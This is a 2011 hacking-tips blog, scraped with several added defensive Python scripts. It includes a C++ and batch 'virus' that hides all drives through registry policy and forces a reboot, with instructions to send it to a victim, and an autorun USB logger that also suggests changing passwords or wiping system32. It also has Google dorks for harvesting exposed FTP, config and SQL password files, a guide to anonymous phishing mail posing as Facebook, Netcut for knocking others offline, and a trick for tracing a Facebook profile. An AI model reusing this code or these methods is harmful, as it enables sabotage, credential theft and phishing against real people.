Friday 2 September 2011

Hackers have obtained Google certificate, could hijack Gmail accounts

Hackers have obtained a digital certificate good for any Google website from a Dutch certificate provider, a security researcher said.

Criminals could use the certificate to conduct "man-in-the-middle" attacks targeting users of Gmail, Google's search engine or any other service operated by the Mountain View, Calif. company.

"This is a wildcard for any of the Google domains," said Roel Schouwenberg, senior malware researcher with Kaspersky Lab, in an email interview Monday.

"[Attackers] could poison DNS, present their site with the fake cert and bingo, they have the user's credentials," said Andrew Storms, director of security operations at nCircle Security.

Man-in-the-middle attacks could also be launched via spam messages with links leading to a site posing as, say, the real Gmail. If recipients surfed to that link, their account login username and password could be hijacked.

Details of the certificate were posted on Pastebin.com last Saturday. Pastebin.com is a public site where developers -- including hackers -- often post source code samples.

According to Schouwenberg, the SSL (secure socket layer) certificate is valid, and was issued by DigiNotar, a Dutch certificate authority, or CA. DigiNotar was acquired earlier this year by Chicago-based Vasco, which bills itself on its site as "a world leader in strong authentication."

Vasco did not reply to a request for comment.

Security researcher and Tor developer Jacob Applebaum confirmed that the certificate was valid in an email answer to Computerworld questions, as did noted SSL researcher Moxie Marlinspike on Twitter. "Yep, just verified the signature, that pastebin *.google.com certificate is real," said Marlinspike.

Because the certificate is valid, a browser would not display a warning message if its user went to a website signed with the certificate.

It's unclear whether the certificate was obtained because of a lack of oversight by DigiNotar or through a breach of the company's certificate issuing website.

Schouwenberg urged the company to provide more information as soon as possible.

"Given their ties to the government and financial sectors it's extremely important we find out the scope of the breach as quickly as possible," Schouwenberg said. The situation was reminiscent of a breach last March, when a hacker obtained certificates for some of the Web's biggest sites, including Google and Gmail, Microsoft, Skype and Yahoo.

Then, Comodo said that nine certificates had been fraudulently issued after attackers used an account assigned to a company partner in southern Europe.

Initially, Comodo argued that Iran's government may have been involved in the theft. Days later, however, a solo Iranian hacker claimed responsibility for stealing the SSL certificates.

Kaspersky's Schouwenberg said "nation-state involvement is the most plausible explanation" for the acquisition of the DigiNotar-issued certificate.

"For one [thing], there's the type of information being looked for -- from Google users," said Schouwenberg. "This hints towards an intelligence operation rather than anything else. Secondly, this type of attack only works when the attacker has some control over the network, but not over the actual machine."

Others were more skeptical because of the claim that a single hacker pulled off the Comodo heist.

"I think it might still be a stretch to attribute this to the Iranian government," said Marlinspike on Twitter shortly before 4 p.m. ET. "We all know how that went last time."

The google.com certificate has not yet been revoked by DigiNotar -- the first step to blocking its use -- even though it was issued July 10.

Last March, browser makers, including Google, Microsoft and Mozilla, rushed out updates that added the stolen Comodo certificates to their applications' blacklists.

Storms said he expected Google to quickly update Chrome, and that Microsoft, Mozilla and others would do the same some time later. "I suspect that if asked [Microsoft and Mozilla] will also issue updates, as there is already a precedent," said Storms.

Friday 26 August 2011

HOW TO TRACE INVISIBLE USERS ON GTALK

Tracing Gtalk users is rather easy; you only have to use the following method:
  1. Log in to Gtalk using your Google ID.
  2. Go to the IM window of the user you want to check for invisibility.
  3. You will see a drop-down list at the top right; click on it.
  4. Click on "go off the record".
  5. Now send any message.
  6. If the "ABC@gmail.com is offline and can't receive messages right now" message appears in red, it means your friend is really offline.
  7. If no message appears, your friend is online and invisible to all.

Track USB drive users

I got an interesting email from my friend who asked me how he can track users who used his USB drive after he has given it to someone. He wanted to get the usernames of the accounts where the pendrive was used. I thought for a while and told him that he can achieve this feat either by using Trojans or a combination of Batch and Autorun files. However, you must advise users not to format the pendrive in order for this to work. The second option of Batch files was easy and less suspicious. So here is how I made it possible to get the usernames when the pendrive was plugged into the PC:
Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:
[autorun]
open=username.bat
action=Open folder to view files
Now, create a batch file called username.bat with the following contents:
@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe
 Create username.bat and autorun.inf in the root of your pendrive
NOTE : The Last Line of the code is optional which will open the explorer in a new window.
Save both files and you are good to go. Now whenever a user plugs your pendrive into their PC, it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear. Now if you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.
However, this is not a foolproof method, as some geeks disable the autoplay option (or disable writing to USB drives), or they just bypass it by pressing the RIGHT SHIFT key when the pendrive is connected and hence their name will not be recorded, or they can delete the users.dat file. But that said, it will work fine nevertheless :)
NOTE 2 : Umm..I think the above code is way too easy and harmless,why not to get creative and create a batch file which will even change the password ?(DOS NET commands) or even wipe out system32 of your nemesis (cacls command) ?

Keep Learning friends..I mean it :P

John the Ripper – Password cracking at its best

If you are into password cracking then you probably know about it: John the Ripper is one of the most popular password testing and breaking programs available. JTR, as it's fondly called, combines multiple password cracking packages into one package, includes auto detection of hashes and is a fast password cracker. It is currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS and supports 15 different platforms. Its primary purpose is to detect weak Unix passwords (no.. I'm kidding, its primary purpose is to break passwords :P). It can natively detect and crack various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. JTR has an active community and multiple third party patches have been added to increase its functionality to include MD4-based password hashes and passwords stored in LDAP, MySQL and other unsupported hashes. JTR is the penultimate when it comes to password cracking in Windows (Cain and Abel is the ultimate :P), but for Linux and open source, it's the best you can get your hands on. Fire it up with a wordlist and you are good to go.

Here is a sample output of JTR in Debian environment (shamelessly taken from Wikipedia)
root@0[john-1.6.37]# cat wpass.txt
user:AZl.zWwxIh15Q
root@0[john-1.6.37]# john -w:password.lst wpass.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
example         (user)
guesses: 1  time: 0:00:00:00 100%  c/s: 752  trying: 12345 - pookie






You can download JTR from here


Thursday 25 August 2011

Advanced password hacking using Google – easy to learn, easy to apply

Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.
Lets start, shall we ?


FTP passwords

ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.
intitle:index.of ws_ftp.ini
You can also use this dork, which uses "parent directory" to avoid results other than directory listings
filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"
Even if the site or file has been taken offline, you can still search the contents in the Google cache using the following dork
"cache:www.abc.com/ws_ftp.ini"
where
http://www.abc.com/ is the site you want to check the dork for.
The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided here or from here.



PHP Hacking

Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.
intitle:index.of config.php
to view php file contents
intitle:"Index of" phpinfo.php
you can also try the directory traversal attack in php using the following dork
inurl:download.php?=filename
if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).
Most websites today deny this trick, but you may get lucky with some :)


SQL Dumps

We will be hunting for SQL password dumps saved in databases. Here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456, one of the most common passwords people keep, and the intext dork allows you to search inside the dump.
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password
Remember kids
  1. Use different email providers, substitute gmail/yahoomail instead of somemail ,or try custom domain mail providers.
  2. Use different file extensions.
  3. Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.
  4. just mix everything up and try different combinations :)

Its not over..Yet
A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.
+htpasswd +WS_FTP.LOG filetype:log
You can substitute "+htpasswd" for "+FILENAME" & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like
phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet
The list goes on and on.. Also you can try this dork to data mine information about the uploader
"allinurl: "some.host.com" WS_FTP.LOG filetype:log"
which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance.

Also..if you are one hell of a lazy b**tard ,you can do it using some software like Google Hacks..but remember, manual way is the way to go. I may have included some software specific password mining, but that would cripple your imagination. My recco ? go postal by using your imagination and developing your own dorks and queries.
I guess that was enough for this time, will be coming with more tuts with time.
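
Seen from the webmaster's side, every dork above only works when one of these files sits somewhere the web server will serve it. The following check is an added example, not part of the original post: it walks a web root on disk and reports the file names those dorks look for. The index file names, the backup-copy patterns and the demo tree are assumptions made for the illustration.

```python
import fnmatch
import os
import tempfile

# File name patterns the dorks in this post search for, with the reason each
# one matters if the web server serves it. Matching is case-insensitive.
RISKY_PATTERNS = [
    ("ws_ftp.ini", "WS_FTP site list with weakly encoded passwords"),
    ("ws_ftp.log", "WS_FTP transfer log (hosts, paths, uploader details)"),
    ("phpinfo.php", "phpinfo() page disclosing server configuration"),
    (".htpasswd", "HTTP auth password hashes"),
    ("*.sql", "database dump, may contain password hashes"),
    # Assumption beyond the post: editor/backup copies of config.php are
    # served as plain text because they no longer end in .php.
    ("config.php.*", "backup copy of config.php readable as text"),
    ("config.php~", "backup copy of config.php readable as text"),
]

# Assumed index names; a directory without one is shown as a file listing
# when the server has directory indexing enabled.
INDEX_FILES = {"index.html", "index.htm", "index.php"}


def find_exposed(web_root):
    """Walk web_root and return sorted (relative_path, reason, listable)."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        lowered = {name.lower() for name in filenames}
        listable = not (lowered & INDEX_FILES)
        for name in filenames:
            for pattern, reason in RISKY_PATTERNS:
                if fnmatch.fnmatchcase(name.lower(), pattern):
                    rel = os.path.relpath(os.path.join(dirpath, name), web_root)
                    findings.append((rel.replace(os.sep, "/"), reason, listable))
                    break
    return sorted(findings)


def build_demo_tree(root):
    """Create a small constructed web root used only for the demonstration."""
    layout = {
        "index.php": "<?php require_once 'config.php'; ?>",
        "config.php": "<?php $db_pass = 'placeholder'; ?>",
        "config.php.bak": "<?php $db_pass = 'placeholder'; ?>",
        "uploads/WS_FTP.LOG": "constructed log line",
        "uploads/photo.jpg": "",
        "backup/site.sql": "-- constructed dump",
        "backup/index.html": "",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write(content)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for rel, reason, listable in find_exposed(demo_root):
            note = " [directory has no index file]" if listable else ""
            print(f"{rel}: {reason}{note}")
```

Point `find_exposed()` at the real document root of your own site; anything it reports should be moved out of the web root or deleted.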

How to use Google to find .edu, .gov and CommentLuv backlinks

You know it, in order to rank high in search engine results pages, you have to get strong backlinks to your blog.

Today, I got even better than a list: I’ll show you a technique to find .edu, and .gov site as well as blog with the CommentLuv plugin enabled, using the power of Google.


Please use the techniques shown this post reasonably and don’t spam any sites. Spam is not an efficient SEO technique and is penalized by Google.

Commenting guidelines

 

Before showing you the techniques, I’d like to insist on the fact that you should never spam blogs or forums. Serious and/or popular sites never spam, and there’s no benefit in doing so.
In order to get a real traffic and seo benefit from the sites you’re going to find, always post relevant comments and use your real name, not a keyword. Also, don’t paste links in the comment text.

Finding .edu or .gov blogs using Google

In order to find .edu or .gov blogs using Google, you simply have to use Google search box and a few special parameters.
Let’s give it a try. Paste the following code in Google.com search box:
site:.edu inurl:blog "post a comment"
Google just returned you thousands of results: sites which have .edu and blog in their URL, as well as “post a comment” in the page. Easy, isn’t it?
Finding .gov blogs is extremely easy as well. The only thing you have to do is to change the extension in the query:

site:.gov inurl:blog "post a comment"
Using the inurl parameter, you can find lots of things, such as wikis. Though, be warned that modifying wikis for promotional or SEO purposes is not a good thing and that it may produce more harm than good.
site:.edu inurl:wiki

How to find blogs with CommentLuv

CommentLuv is a free WordPress plugin which automatically creates a link (generally dofollow) to the commenter's last post. Of course, leaving a comment on a CommentLuv enabled blog is good for your SEO.

But now, how to find blogs with CommentLuv? Just use the following query and enjoy Google results. The text within quotes is the text that must be contained in the page, and “blogging tips” are just keywords related to what you’re looking for.
"Enable CommentLuv" blogging tips

Finding blog with the “Top Commenters” widget


Top Commenters is another free WordPress plugin which rewards top commenters with a link, generally in the blog sidebar. It used to be very popular but it seems its popularity has decreased. Anyway, using Google it is still pretty easy to find some blogs with this widget enabled:
"Top Commenters" make money
Good luck in your backlink search, and please remember to stay reasonable.

Wednesday 24 August 2011

How to compress 1 Gb data to 10 mb

Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.


How effective is it?

Well, by this method I converted NFS UNDERGROUND 2, which is somewhere around 2 Gb, to 21 Mb. And same is the case with everything important I wanted to save.


How did I do it?

You are just about to know… Read on.

I used a software named KGB Archiver.

About KGB Archiver: KGB Archiver is an open source compression tool like 7zip and UHARC with an unbelievably high compression rate. It uses AES-256 encryption (one of the strongest encryption known to man) to encrypt archives. The disappointing thing with KGB Archiver is that, due to its high compression rate, its minimum hardware requirement is high (recommended: a processor with a 1.5GHz clock and 256MB of RAM) and the compression and decompression process is time consuming.


Its strength: Very high compression power with very accurate results and no loss of data.

Its weakness: Due to high compression, the time required to compress and decompress the file is high. High system requirements.

From where can you download this software.?

 Just click on the link given to Download KGB archiver for free.

Click Here to Download KGB Archiver for free.

5 Things Every Beginner Hacker Should Know

Hey guyz, today at http://hacking-information.blogspot.com/ we are going to discuss “5 Most Common Mistakes Done by Beginners in the field of Hacking“ or we can say “5 things Every New Beginner Hacker Should Know”.

This post is for everyone out there who actually want to become a true hacker:-


1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.


2) There is NO DIRECT SOFTWARE to Hack Facebook, Google, Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.


3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.


4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.


5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.


So never ever underestimate the term Hacker. A Hacker is not a person who just hacks email IDs or servers; a True Hacker is a Computer Genius who has more knowledge of computers than anyone.

Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.

What is l33t or Language Used By Hackers

Hey Guys , today I want to tell you something from the Hackers World. This is something not everyone is aware of. Today I am going to tell you about l33t.

Do you know what is “leet” or “l33t”?

Any idea?

Just read on..

According to Wikipedia:- Leet (or “1337″), also known as eleet or leetspeak, is an alternative alphabet for the English language that is used primarily on the Internet. It uses various combinations of ASCII characters to replace Latinate letters. For example, leet spellings of the word leet include 1337 and l33t; eleet may be spelled 31337 or 3l33t.

Hackers communicate between themselves in a language which is a combination of alphabets, numbers and symbols etc… This 1337 is very famous in the hacking and internet world. We can say that it is the language used by hackers.

GOOGLE PAGE OF 1337 OR LEET

The reason I am writing this post is that I found a dedicated page on Google on “1337″ or “leet”. I am giving you guys the link to it.. Just follow the link below
http://www.google.com/webhp?hl=xx-hacker

How to Learn Leet or 1337

If you want to learn the Hacker’s Language ie.. Leet then just follow this table on Wikipedia. It has the complete reference guide for it.
http://en.wikipedia.org/wiki/Leet

Leet Converter

I am also providing you with a link to Leet converter. You just have to type your text in English and the converter will itself convert the text into leet for you. You can also control the extent of leet you want. To learn more, just visit and check yourself. Click on the link below to visit the page


Though there are many converters online, but I found this one to be the best one.

So, how many of you actually knew that..:P

Anyways thats all for today.

I hope you liked it.

5 Ways to Check if you are Hacked

In this post I am going to tell You 5 ways in which you can check if you are hacked.
Just follow along and check all the steps, you might also be one of the victims.

NOTE:- Before doing these steps, close all the downloads and web pages. Make sure no torrent or Windows update install is going on, but stay connected to the internet.

1) The first method is very simple for all the people using an ADSL router. After all the internet downloads are closed, just check the status of the Ethernet light. It should not blink at a very fast rate; fast blinking shows that packets are being transferred in and out of your computer.
Since there is no active download or internet activity, no packets should be transferred. If they are… you might be hacked.

2) Go to Run and type cmd. The command prompt will open. In the command prompt type
netstat -a
This shows the list of active internet connections. Check if any unnecessary internet connection is ESTABLISHED; if so, you might be hacked. If you type just netstat, you will get the list of all the netstat commands; you may try the other commands as well.

3) If you notice any abnormal activity in your computer, like your computer hanging for a couple of seconds every time you switch it on or in between your tasks (if it occurs often), there is a chance that you are hacked. Often keyloggers and trojans are configured to deliver all the log information to the destination IP address/FTP address at regular intervals. And when this information is being sent, the browser hangs for some time.

4) Use software like TCPView; it gives the list of all the connections made through TCP. This software is capable of detecting almost all the trojan/malicious connections.

5) Keep the antivirus updated and install an external firewall like Comodo. If your antivirus is not updated regularly, it is as good as nothing. If you don’t update your antivirus regularly, and you often exchange data with other computers and download a lot of files, there is a great possibility that you are hacked.

Beware!! Stay updated, stay Protected.
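
Step 2 can be partly automated. The script below is an added example, not part of the original post: it parses saved netstat output and lists ESTABLISHED TCP connections to non-local addresses on ports you do not expect. It assumes the numeric form `netstat -an`, an allowlist of ports 80 and 443, and a constructed sample capture that uses documentation addresses.

```python
import ipaddress

# Constructed sample of Windows `netstat -an` output (documentation addresses).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5354         127.0.0.1:49670        ESTABLISHED
  TCP    192.168.1.20:49712     192.168.1.1:445        ESTABLISHED
  TCP    192.168.1.20:49730     203.0.113.45:6667      ESTABLISHED
  TCP    192.168.1.20:49731     198.51.100.7:443       ESTABLISHED
  TCP    192.168.1.20:49732     203.0.113.45:6667      ESTABLISHED
  UDP    0.0.0.0:5353           *:*
"""

# Loopback, RFC 1918 and link-local ranges are treated as "local".
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "fe80::/10")]

# Assumption: with all downloads closed, only web traffic is expected.
EXPECTED_PORTS = {80, 443}


def split_endpoint(endpoint):
    """Split 'host:port' or '[v6addr]:port' into (host, port_string)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def is_local(host):
    """True when host is an IP address inside one of LOCAL_NETS."""
    try:
        addr = ipaddress.ip_address(host.split("%")[0])  # drop IPv6 zone id
    except ValueError:
        return False  # a resolved host name: treat it as external
    return any(addr in net for net in LOCAL_NETS)


def established(text):
    """Yield (local, remote_host, remote_port) for ESTABLISHED TCP rows."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0].upper() == "TCP" and parts[3] == "ESTABLISHED":
            host, port = split_endpoint(parts[2])
            if port.isdigit():
                yield parts[1], host, int(port)


def unexpected_remotes(text, expected_ports=EXPECTED_PORTS):
    """Return sorted unique (host, port) pairs that deserve a closer look."""
    hits = set()
    for _local, host, port in established(text):
        if not is_local(host) and port not in expected_ports:
            hits.add((host, port))
    return sorted(hits)


if __name__ == "__main__":
    for host, port in unexpected_remotes(SAMPLE):
        print(f"review: ESTABLISHED connection to {host} port {port}")
```

A hit is a lead, not a verdict: look up which process owns the connection before concluding anything.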
 

Hacking Autorun.inf virus attack|Is autorun.inf virus?



When I was studying in second year (CSE), my friends told me that autorun.inf is a virus. I thought so too, because my antivirus blocks autorun.inf files. In third year, when I searched the net about the autorun.inf file, I learned what the autorun file really is.



Today I brought some files from my college system. When I inserted the pen drive in my system, there were a lot of exe files. They are viruses. I deleted all of them. Finally I opened the autorun.inf file in notepad and saw the instructions. Only then did I remember that I forgot to post about the autorun file. This article will give you complete details about the autorun.inf file.

These are the instructions saved in the infected autorun.inf file (the one that calls virus programs):



[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Is autorun.inf a virus file? No. Then why does antivirus block autorun.inf files? Read on to know the full details about the autorun file.

Introduction to Autorun.inf File:

Autorun is a file that triggers other programs, documents or other files to be opened when a CD or pen drive is inserted. It simply triggers.

When a CD or pen drive is inserted, Windows will search for the autorun.inf file and follow the instructions written inside it.

How to create Autorun file?

Open notepad
type this command:
[Autorun]
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:

The basic syntax that must be inside the autorun.inf file is:
[Autorun]
This is used to identify the file as autorun.

OPEN=

This will specify which application should be opened when the cd or pen drive is opened

Example:
open=virus.exe
This will launch the virus.exe file when the CD or pen drive is opened. The file should be in the root directory.

If the file is in any other subdirectory, then we have to specify it.
Open=RECYCLER\Virus.exe

Explore=

Not much different: if you right click the CD or pen drive and select the Explore option, this command will be run.

AutoPlay=

Same as the above, but it will launch the program when auto played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=

Change the icon of your pen drive or CD. You can use .ico and .bmp images (also .exe and .dll).

Example:
icon=breakthesecurity.ico

Label=

Specifies a text label to be displayed for this CD in Explorer.

Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:
Label=Ethical hacking

Why Antivirus Block Autorun.inf file?

From the above, you now know that the autorun.inf file is not a virus. But why does antivirus block it? Because, as I said, an autorun file can call or launch any application or exe file, which can lead to a virus attack. If autorun.inf is blocked, there is no way to launch the virus code.

Autorun is not virus but it can call virus files.
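
The same reasoning can be turned into a check you run on a drive's autorun.inf before opening it. This is an added example, not code from the original post: it parses the [autorun] section and reports every key that launches a program, using the infected file shown above as input. The extension list, the folder list and the `shellexecute` key are additions not taken from the post.

```python
import ntpath
import re

# Keys that make Windows start a program. open/explore/autoplay and the
# shell\<verb>\command form come from the post; shellexecute is a further
# autorun.inf key added here.
LAUNCH_KEYS = {"open", "explore", "autoplay", "shellexecute"}
SHELL_COMMAND = re.compile(r"shell\\[^\\]+\\command")

# Assumed lists for the illustration.
EXECUTABLE_EXTS = {".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".js"}
HIDING_DIRS = {"recycler", "recycled", "$recycle.bin", "system volume information"}

# The infected autorun.inf quoted earlier in this post.
INFECTED = r"""[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe
"""

# Built from the post's harmless Icon= and Label= examples.
BENIGN = "[autorun]\nicon=breakthesecurity.ico\nLabel=Ethical hacking\n"


def parse_autorun(text):
    """Return (key, value) pairs from the [autorun] section, keys lower-cased."""
    entries, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries.append((key.strip().lower(), value.strip()))
    return entries


def command_target(value):
    """Extract the program path from a command line, honouring quotes."""
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split(None, 1)[0] if value else ""


def analyze(text):
    """Return (key, target, reasons) for each launch entry worth reviewing."""
    findings = []
    for key, value in parse_autorun(text):
        if key not in LAUNCH_KEYS and not SHELL_COMMAND.fullmatch(key):
            continue
        target = command_target(value)
        reasons = []
        ext = ntpath.splitext(target)[1].lower()
        if ext in EXECUTABLE_EXTS:
            reasons.append(f"launches a {ext} file")
        folders = [part.lower() for part in re.split(r"[\\/]", target)[:-1]]
        if any(folder in HIDING_DIRS for folder in folders):
            reasons.append("target sits in a system-style folder")
        if reasons:
            findings.append((key, target, reasons))
    return findings


if __name__ == "__main__":
    for key, target, reasons in analyze(INFECTED):
        print(f"{key} -> {target}: {', '.join(reasons)}")
```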

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :


#include < windows.h >

#include < fstream.h >

#include < iostream.h >

#include < string.h >

#include < conio.h >

int main()

{

ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/



write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }




Copy the above code and paste in notepad

Save the file with .cpp extension

Compile and create .exe file in cpp

Note:

Don't run this c++ program ,it will attack your system itself.

Copy the created .exe file and send it to your victim. You can also attach it with any other

exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.

Copy the above code to notepad.

Save it with .bat extension (for ex: nodrivevirus.bat)

Send the file to your victim

How to send Anonymous Mail to anyone|Set up your own server



Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.




What is the Use?

I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.



For Eg:

You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Step 1:

First of all you need to register in free web hosting service which has PHP feature.  So my choice is



Step 2:

Now Download this zip file:

             Mail.php
Inside the file you can find the mail.php file. Extract the file



Step 3:

Now Go to x10hosting.com and login with your username and password.

Upload the "mail.php" file to "public_html" folder.



Step 4:

That's all you finished.

Now go to this page

         yourhosturl/mail.php
Change the yourhosturl with your website url which you gave it when you register in x10hosting.com

For eg:

yourfavorites.x10.mx/mail.php



Usually the default will be "name.x10.mx"



When you visit you will see the form just like this:





Fill the form with your victim mail address and message subject and send



     Don't give your details in the sender field.

Just fill with any organization name.

For Eg:

BestSurveyProviders


Tuesday 23 August 2011

Bandwidth Stealer For Fast Browsing

If you are in your school's computer lab or at home, this software will always help you in your work. It is common to have many computers connected to one device for internet, and this causes your bandwidth to fall. Here I am introducing a software called netcut, which cuts someone's connection in such a crucial condition. I call it crucial because it is really a headache-causing problem for me; I hate slow surfing. When it cuts someone's connection, it automatically increases the bandwidth of your connection, which will let you work more easily and quickly.

Download Netcut here for Free:-

You can download this bandwidth stealing software named as Netcut from below:-
Download Netcut
Using Netcut :-
1: Download net cut.
2: Extract the software and install it.
3: Now open netcut software and a window will pop-out showing you connected routers.
4: Just toggle to the computer which you want to cut off.
5: And that's it. Now you are free to eat up every last bit of bandwidth. Enjoy :D

Find Any Facebook Profile By using Picture

Today I'll discuss a short and smart trick with which you can easily locate any Facebook profile within seconds. The thing that matters is that the picture must have the unique name in which the address of the person's profile is hidden. It may help you some day, which is why I am sharing this trick. First, go to the picture and see the name with which it has been saved anywhere. It must be in some numerical figures having a "_n" at the end.
Lets, Take a picture and inspect its name, so we found the following name of the picture:
23213_100000967034368_1371_n
Now, We have to find profile address out of it, Just ignore the 23213 in the start and also 1371_n in the end, Just copy the mid snippet of numbers like 100000967034368 , And after this paste it in notepad.
Now, Take this URL:
http://www.facebook.com/profile.php?id=
And paste the snippet of numbers which you have pasted in notepad just after it like this:
http://www.facebook.com/profile.php?id=100000967034368
Copy this whole URL and Paste this in browser address bar and hit enter, After this you,ll see the person’s, whose pic was here only, Facebook profile in front of you. Open-mouthed smile Small trick but useful one in some cases.

Ten SQL Injection Scanners


